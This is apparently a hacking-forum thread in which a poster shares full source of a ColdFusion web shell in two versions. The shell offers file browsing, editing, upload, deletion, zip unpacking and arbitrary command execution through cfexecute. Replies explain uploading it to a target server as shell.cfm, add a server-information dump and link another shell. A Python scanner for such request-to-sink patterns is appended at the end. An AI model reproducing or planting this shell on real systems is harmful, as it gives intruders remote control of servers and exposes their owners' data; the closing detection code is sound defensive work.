After scouring the internet for a cfm shell, I found nothing except one shell that I think everyone knows: the one that lets you run a file. But in my case running files was not possible, so I had to write my own shell.
CFMshell v. 1.0
- file manager (deleting and renaming files/directories, creating directories)
- file editing
- file upload
- running files
http://pastebin.com/hKS5k792
Code:
<html> <style> td {border:1px solid black;} table {border-collapse: collapse;} #header {background-color: black;color:white;} #header td { border-color:white; } a {color:black} </style> <body> <cfif isdefined("Form.cmd")> <cfset CP="#Form.cmd#"> <cfif isdefined("Form.act")> <cfset actn = "#Form.act#"> <cfif actn is "D"> <cfdirectory directory = "#CP#" action = "delete"> <cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#"> <cfelse> <cfif actn is "R"> <cfdirectory directory = "#CP#" action = "rename" newDirectory = "#Form.dirname#"> <cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#"> <cfelse> <cfif actn is "S"> <cffile action = "write" file = "#CP#" output = "#Form.fcontents#"> <cfset CP="#getDirectoryFromPath(CP)#"> <cfelse> <cfif actn is "FD"> <cffile action = "delete" file = "#CP#"> <cfset CP="#getDirectoryFromPath(CP)#"> <cfelse> <cfif actn is "FR"> <cffile action = "rename" source = "#CP#" destination = "#getDirectoryFromPath(CP) & Form.dirname#" > <cfset CP="#getDirectoryFromPath(CP)#"> </cfif> </cfif> </cfif> </cfif> </cfif> </cfif> <cfelse> <cfset currentPath = getCurrentTemplatePath()> <cfset currentDirectory = getDirectoryFromPath(currentPath)><cfset CP="#currentDirectory#"> </cfif> <cfif isdefined("Form.fname")> <cfset fn = "#Form.fname#"> <cfif GetFileFromPath(fn) is not ""> <cfif fn is not ""> <cfsavecontent variable="sc"> <cfexecute name = "#Form.fname#" arguments = "#Form.opts#"> </cfexecute> </cfsavecontent> </cfif> </cfif> </cfif> <cfif GetFileFromPath(CP) is ""> <cfif isdefined("Form.FiletoUpload")> <cfset ftu = 
"#Form.FiletoUpload#"> <cfif ftu is not ""> <cffile action="upload" destination="#CP#" nameConflict="overwrite" fileField="Form.FiletoUpload"> </cfif> </cfif> <cfif isdefined("Form.newdir")> <cfset ftu = "#Form.newdir#"> <cfif ftu is not ""><cfdirectory directory = "#CP & Form.newdir#" action = "create"></cfif> </cfif> <cfif isdefined("sc")> <cfif sc is not ""> <cfoutput><p>#sc#</p></cfoutput> </cfif> </cfif> <form method="POST" name="frm" enctype="multipart/form-data"> <table> <tr><td width="100px">Current dir</td><td><input type=text name="cmd" id="cmd" size=50 <cfoutput>value = "#CP#" </cfoutput> ></td></tr> <tr><td>Upload file</td><td><input type="file" name="FiletoUpload" size="50"></td></tr> <tr><td>Create dir</td><td><input type=text name="newdir" size=50></td></tr> <tr><td></td></tr> <tr><td>Filename to exec:</td><td><input type=text name="fname" size=50 value="<cfoutput>#CP#</cfoutput>"></td></tr> <tr><td>Options:</td><td><input type=text name="opts" size=50></td></tr> <tr><td><input type="submit" value="Do it!"></td></tr> </table> <input type="hidden" name="act" id="act" value="" /> <input type="hidden" name="dirname" id="dirname" value="" /> <table width="100%"> <tr id="header"><td width="*">Name</td><td width="100px">Size</td><td width="100px">Type</td><td width="100px">Modified</td><td width="100px">Attr</td><td width="100px">Mode</td><td width="100px">Action</td></tr> <tr><td><cfoutput><a href="javascript:document.getElementById('cmd').value='#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#';document.frm.submit()"><b>[..]</b></a></cfoutput></td><td></td><td></td><td></td><td></td><td></td><td></td></tr> <cfdirectory action="list" directory="#CP#" name="directories" sort="name ASC" type="dir"> <cfoutput query="directories"> <tr> <td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.frm.submit()"><b>[#directories.name#]</b></a></td> <td>#directories.size#</td> <td>#directories.type#</td> 
<td>#directories.dateLastModified#</td> <td>#directories.attributes#</td> <td>#directories.mode#</td> <td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='D';document.frm.submit()"><b>D</b></a> <a href="javascript:var newdirname = prompt('Enter new dir name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='R';document.getElementById('dirname').value=newdirname;document.frm.submit(); }"><b>R</b></a></td> </tr> </cfoutput> <cfdirectory action="list" directory="#CP#" name="files" sort="name ASC" type="file"> <cfoutput query="files"> <tr> <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.frm.submit()">#files.name#</a></td> <td>#files.size#</td> <td>#files.type#</td> <td>#files.dateLastModified#</td> <td>#files.attributes#</td> <td>#files.mode#</td> <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FD';document.frm.submit()">D</a> <a href="javascript:var newdirname = prompt('Enter new file name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FR';document.getElementById('dirname').value=newdirname;document.frm.submit(); }">R</a></td> </tr> </cfoutput> </table> <cfelse> <cffile action="read" file="#CP#" variable="Fcont"> <form method="POST" name="frm"> <input type="hidden" name="cmd" id="cmd" value="<cfoutput>#CP#</cfoutput>"> <input type="hidden" name="act" id="act" value=""> <textarea name="fcontents" style="width:100%;height:400px"> <cfoutput> #Fcont# </cfoutput> </textarea> <div><button onclick="document.getElementById('act').value='s';document.frm.submit();">Save</button><button onclick="document.getElementById('cmd').value='<cfoutput>#getDirectoryFromPath(CP)#</cfoutput>';document.frm.submit();">Back</button></div> 
</cfif> </form> </body> </html>
P.S. Don't kick me too hard, since I don't know ColdFusion at all.
CFMshell v. 1.1
- fixed the bug with slashes on the Windows platform (all sorts of garbage characters came out)
- fixed the bug with viewing files that contain a textarea
- added the ability to unpack zip archives (CF 8+, if I'm not mistaken)
- made the interface nicer
_http://pastebin.com/pu04UCq9
Code:
<html> <style> #rounded-corner {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;} #current-path {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;margin:0px;margin-bottom:2px;padding:10px 0px;background:#b9c9fe} #rounded-corner thead th.rounded-q1 {background: #b9c9fe;} #rounded-corner thead th.rounded-q4 {background: #b9c9fe;width:100px} #rounded-corner th {padding: 8px;font-weight: normal;font-size: 13px;color: #039;background: #b9c9fe;} #rounded-corner td {padding: 8px;background: #e8edff;border-top: 1px solid #fff;color: #669;} #rounded-corner tbody tr:hover td {background: #d0dafd;} a {color:black} </style> <cfif isdefined("Form.cmd")> <cfset CP="#Replace(Form.cmd,"\","/","all")#"> <cfif isdefined("Form.act")> <cfset actn = "#Form.act#"> <cfif actn is "D"> <cfdirectory directory = "#CP#" action = "delete"> <cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#"> <cfelse> <cfif actn is "R"> <cfdirectory directory = "#CP#" action = "rename" newDirectory = "#Form.dirname#"> <cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#"> <cfelse> <cfif actn is "S"> <cffile action = "write" file = "#CP#" output = "#Form.fcontents#"> <cfset CP="#getDirectoryFromPath(CP)#"> <cfelse> <cfif actn is "FD"> <cffile action = "delete" file = "#CP#"> <cfset CP="#getDirectoryFromPath(CP)#"> <cfelse> <cfif actn is "FR"> <cffile action = "rename" source = "#CP#" destination = "#getDirectoryFromPath(CP) & Form.dirname#" > <cfset CP="#getDirectoryFromPath(CP)#"> </cfif> </cfif> </cfif> </cfif> </cfif> </cfif> <cfelse> 
<cfset currentPath = getCurrentTemplatePath()> <cfset currentDirectory = getDirectoryFromPath(currentPath)><cfset CP="#Replace(currentDirectory,"\","/","all")#"> </cfif> <cfif isdefined("Form.fname")> <cfset fn = "#Form.fname#"> <cfif GetFileFromPath(fn) is not ""> <cfif fn is not ""> <cfsavecontent variable="sc"> <cfexecute name = "#Form.fname#" arguments = "#Form.opts#"> </cfexecute> </cfsavecontent> </cfif> </cfif> </cfif> <cfif GetFileFromPath(CP) is ""> <cfif isdefined("Form.FiletoUpload")> <cfset ftu = "#Form.FiletoUpload#"> <cfif ftu is not ""> <cffile action="upload" destination="#CP#" nameConflict="overwrite" fileField="Form.FiletoUpload"> </cfif> </cfif> <cfif isdefined("Form.zname")> <cfset zn = "#Form.zname#"> <cfset ftu = "#Form.ftunpack#"> <cfif GetFileFromPath(zn) is not ""> <cfzip file="#zn#" action="unzip" destination="#ftu#"> </cfif> </cfif> <cfif isdefined("Form.newdir")> <cfset ftu = "#Form.newdir#"> <cfif ftu is not ""><cfdirectory directory = "#CP & Form.newdir#" action = "create"></cfif> </cfif> <cfif isdefined("sc")> <cfif sc is not ""> <cfoutput><p>#sc#</p></cfoutput> </cfif> </cfif> <body> <form method="POST" name="frm" enctype="multipart/form-data"> <div id="current-path"><div style="width:20%;float:left;padding-left:10px">Current dir</div><div><input style="width:70%" type=text name="cmd" id="cmd" size=50 <cfoutput>value = "#CP#" </cfoutput> ></div></div> <div id="current-path"><div style="width:20%;float:left;padding-left:10px">Upload file</div><div><input type="file" name="FiletoUpload" style="width:70%"></div></div> <div id="current-path"><div style="width:20%;float:left;padding-left:10px">Create dir</div><div><input type=text name="newdir" style="width:70%"></div></div> <div id="current-path"> <div style="width:20%;float:left;padding-left:10px">Filename to exec</div><div><input type=text name="fname" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div> <div style="width:20%;float:left;padding-left:10px">Options</div><div><input 
type=text name="opts" style="width:70%"></div> </div> <div id="current-path"> <div style="width:20%;float:left;padding-left:10px">Zip archive</div><div><input type=text name="zname" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div> <div style="width:20%;float:left;padding-left:10px">Folder to unpack</div><div><input type=text name="ftunpack" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div> </div> <div id="current-path" style="margin-bottom:20px"><div style="width:200px;margin:0px auto"><input type="submit" value="Do it!" style="width:200px"></div></div> <input type="hidden" name="act" id="act" value="" /> <input type="hidden" name="dirname" id="dirname" value="" /> <table id="rounded-corner"> <thead><tr><th scope="col" class="rounded-q1">Name</th><th scope="col" class="rounded-q4">Size</th><th scope="col" class="rounded-q4">Type</th><th scope="col" class="rounded-q4">Modified</th><th scope="col" class="rounded-q4">Attributes</th><th scope="col" class="rounded-q4">Mode</th><th scope="col" class="rounded-q4">Action</th></tr></thead> <tr><td><cfoutput><a href="javascript:document.getElementById('cmd').value='#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#';document.frm.submit()"><b>[..]</b></a></cfoutput></td><td></td><td></td><td></td><td></td><td></td><td></td></tr> <cfdirectory action="list" directory="#CP#" name="directories" sort="name ASC" type="dir"> <tbody> <cfoutput query="directories"> <tr> <td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.frm.submit()"><b>[#directories.name#]</b></a></td> <td>#directories.size#</td> <td>#directories.type#</td> <td>#directories.dateLastModified#</td> <td>#directories.attributes#</td> <td>#directories.mode#</td> <td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='D';document.frm.submit()"><b>Del</b></a> <a href="javascript:var newdirname = prompt('Enter new dir name : ', 'here');if 
(newdirname!=='') {document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='R';document.getElementById('dirname').value=newdirname;document.frm.submit(); }"><b>Rnm</b></a></td> </tr> </cfoutput> <cfdirectory action="list" directory="#CP#" name="files" sort="name ASC" type="file"> <cfoutput query="files"> <tr> <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.frm.submit()">#files.name#</a></td> <td>#files.size#</td> <td>#files.type#</td> <td>#files.dateLastModified#</td> <td>#files.attributes#</td> <td>#files.mode#</td> <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FD';document.frm.submit()">Del</a> <a href="javascript:var newdirname = prompt('Enter new file name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FR';document.getElementById('dirname').value=newdirname;document.frm.submit(); }">Rnm</a></td> </tr> </cfoutput> </tbody> </table> </body> <cfelse> <body style="background:#b9c9fe"> <cffile action="read" file="#CP#" variable="Fcont"> <cfoutput> <div style="font-size:16px;padding:20px;0px;font-weight:bold">#CP#</div> </cfoutput> <form method="POST" name="frm"> <input type="hidden" name="cmd" id="cmd" value="<cfoutput>#CP#</cfoutput>"> <input type="hidden" name="act" id="act" value=""> <textarea name="fcontents" style="width:100%;height:400px"> <cfoutput> #HTMLEditFormat(Fcont)# </cfoutput> </textarea> <div style="margin-top:20px"><button onclick="document.getElementById('act').value='s';document.frm.submit();" style="width:100px;margin-right:20px">Save</button><button onclick="document.getElementById('cmd').value='<cfoutput>#getDirectoryFromPath(CP)#</cfoutput>';document.frm.submit();" style="width:100px">Back</button></div> </body> </cfif> </form> </html>
Umm... what's unclear? cfm -> coldfusion -> upload something like shell.cfm and use it. By analogy: php -> php -> upload wso2.php and use it.
Server information output (everything I've found so far)
Code:
<table>
<cfoutput>
<tr><td colspan="2">CGI server variable</td></tr>
<tr><td>SERVER_SOFTWARE</td><td>#CGI.SERVER_SOFTWARE#</td></tr>
<tr><td>SERVER_NAME</td><td>#CGI.SERVER_NAME#</td></tr>
<tr><td>GATEWAY_INTERFACE</td><td>#GATEWAY_INTERFACE#</td></tr>
<tr><td>SERVER_PROTOCOL</td><td>#CGI.SERVER_PROTOCOL#</td></tr>
<tr><td>SERVER_PORT</td><td>#CGI.SERVER_PORT#</td></tr>
<tr><td>REQUEST_METHOD</td><td>#CGI.REQUEST_METHOD#</td></tr>
<tr><td>PATH_INFO</td><td>#CGI.PATH_INFO#</td></tr>
<tr><td>PATH_TRANSLATED</td><td>#CGI.PATH_TRANSLATED#</td></tr>
<tr><td>SCRIPT_NAME</td><td>#CGI.SCRIPT_NAME#</td></tr>
<tr><td>QUERY_STRING</td><td>#CGI.QUERY_STRING#</td></tr>
<tr><td>REMOTE_HOST</td><td>#CGI.REMOTE_HOST#</td></tr>
<tr><td>REMOTE_ADDR</td><td>#CGI.REMOTE_ADDR#</td></tr>
<tr><td>AUTH_TYPE</td><td>#CGI.AUTH_TYPE#</td></tr>
<tr><td>REMOTE_USER</td><td>#CGI.REMOTE_USER#</td></tr>
<tr><td>AUTH_USER</td><td>#CGI.AUTH_USER#</td></tr>
<tr><td>REMOTE_IDENT</td><td>#CGI.REMOTE_IDENT#</td></tr>
<tr><td>CONTENT_TYPE</td><td>#CGI.CONTENT_TYPE#</td></tr>
<tr><td>CONTENT_LENGTH</td><td>#CGI.CONTENT_LENGTH#</td></tr>
<tr><td colspan="2">Server variables</td></tr>
<tr><td>Product Name</td><td>#Server.ColdFusion.ProductName#</td></tr>
<tr><td>Product Level</td><td>#Server.ColdFusion.ProductLevel#</td></tr>
<tr><td>Supported Locales</td><td>#Server.ColdFusion.SupportedLocales#</td></tr>
<tr><td>OS Name</td><td>#Server.OS.Name#</td></tr>
<tr><td>OS Additional Information</td><td>#Server.OS.AdditionalInformation#</td></tr>
<tr><td>OS Version</td><td>#Server.OS.Version#</td></tr>
<tr><td>OS BuildNumber</td><td>#Server.OS.BuildNumber#</td></tr>
</cfoutput>
</table>
It seems to me it's simpler to use an asp shell, since 90% of ColdFusion installs sit on Windows platforms running IIS (which works with asp without much effort). The remaining 10% sit on Linux under Apache and, as is often the case, with a PHP interpreter installed. Anyway, well done, it may come in handy.
I found a quite decent cfm shell, author "Sebastien Denis": file manager, system command execution, database query execution. Very convenient overall. Go for it http://pastebin.com/jk9HPX3A
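
The code posted in this thread routes request fields (Form.cmd, Form.fname, Form.fcontents) straight into cfexecute, cffile, cfdirectory and cfzip, which is a pattern a static scan of a web root can flag. The following is an added detection example, not part of any post in the thread; the one-hop taint tracking, the sink list and the flagging threshold are assumptions, and both sample templates are constructed.

```python
import re

SOURCES = r"(?:Form|URL)\."   # request scopes the client controls
# Tags worth flagging; None means any use counts, otherwise only these actions.
SINKS = {"cfexecute": None, "cfzip": None,
         "cffile": {"write", "upload", "delete", "rename"},
         "cfdirectory": {"create", "delete", "rename"}}

def tainted_names(cfml):
    """Variables set directly from a request scope, e.g. <cfset CP="#Form.cmd#">."""
    pat = r'<cfset\s+(\w+)\s*=\s*"[^"]*\b' + SOURCES
    return {m.group(1).lower() for m in re.finditer(pat, cfml, re.I)}

def find_sinks(cfml):
    """Sorted (tag, action) pairs whose attributes interpolate request data."""
    alts = [r"\b" + SOURCES] + [r"\b%s\b" % re.escape(n) for n in tainted_names(cfml)]
    ref = r"#[^#]*(?:" + "|".join(alts) + r")[^#]*#"
    hits = set()
    for m in re.finditer(r"<(cffile|cfdirectory|cfexecute|cfzip)\b[^>]*>", cfml, re.I):
        tag, text = m.group(1).lower(), m.group(0)
        act = re.search(r'\baction\s*=\s*"(\w+)"', text, re.I)
        action = act.group(1).lower() if act else ""
        if SINKS[tag] is not None and action not in SINKS[tag]:
            continue              # read/list actions are not flagged
        if re.search(ref, text, re.I):
            hits.add((tag, action))
    return sorted(hits)

def is_suspect(cfml):
    """Request-driven process execution, or two or more request-driven write sinks."""
    sinks = find_sinks(cfml)
    return any(tag == "cfexecute" for tag, _ in sinks) or len(sinks) >= 2

# Constructed samples (not real files): one ordinary template, one using the
# request-to-sink pattern seen in this thread.
BENIGN = '''<cfset title = "#Form.title#">
<cffile action="read" file="#ExpandPath('./news.txt')#" variable="body">
<cffile action="upload" destination="#ExpandPath('./up')#" fileField="Form.photo">'''
SUSPECT = '''<cfset CP="#Form.cmd#">
<cffile action = "write" file = "#CP#" output = "#Form.fcontents#">
<cfdirectory directory = "#CP#" action = "delete">
<cfexecute name = "#Form.fname#" arguments = "#Form.opts#"></cfexecute>'''

if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, is_suspect(src), find_sinks(src))
```

A regex pass like this is a triage heuristic: it misses obfuscated or multi-hop data flow, so hits should be confirmed by reading the template and checking web-server logs for POST requests to it.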